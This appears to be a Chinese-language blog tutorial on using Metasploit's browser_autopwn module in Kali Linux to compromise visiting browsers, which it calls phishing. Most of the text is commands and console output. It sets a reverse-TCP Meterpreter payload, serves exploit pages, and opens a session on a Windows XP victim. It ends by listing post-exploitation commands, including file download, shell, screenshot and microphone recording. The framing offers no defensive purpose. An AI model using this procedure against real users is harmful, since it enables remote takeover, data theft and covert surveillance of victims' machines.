kali metasploit 之 autopwn 浏览器钓鱼，java漏洞

本文介绍的autopwn是kali中自带的那个autopwn，

不是相对于bt5被删除的那个autopwn.

1.打开msfconsole, 找出autopwn目录及使用

msf > search autopwn

Matching Modules
================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   auxiliary/server/browser_autopwn                   normal  HTTP Client Automatic Exploiter

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > 

2.配置 show options 查看

msf auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set LHOST 192.168.154.133
LHOST => 192.168.154.133
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.154.133 yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Auxiliary action:

Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) >

3.开始钓鱼

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2015-03-29 13:30:57 +0800
msf auxiliary(browser_autopwn) > [*] Done in 1.298861072 seconds

[*] Starting exploit modules on host 192.168.154.133...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cqTfdfXcWFC
[*] Local IP: http://192.168.154.133:8080/cqTfdfXcWFC
[*] Server started.

4.等待对方浏览器访问

http://192.168.154.133:8080/fMOGHtWS

[*] Sending stage (30355 bytes) to 192.168.154.136
[*] Meterpreter session 1 opened (192.168.154.133:7777 -> 192.168.154.136:1083) at 2015-03-29 13:36:19 +0800
[*] Session ID 1 (192.168.154.133:7777 -> 192.168.154.136:1083) processing InitialAutoRunScript ‘migrate -f‘

5.开始一个会话

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter java/java  admin @ admin-ca9ac4217  192.168.154.133:7777 -> 192.168.154.136:1083 (192.168.154.136)

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

6.会话进行

meterpreter > getuid
Server username: admin
meterpreter > sysinfo
Computer    : admin-ca9ac4217
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for ‘load‘
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds

meterpreter >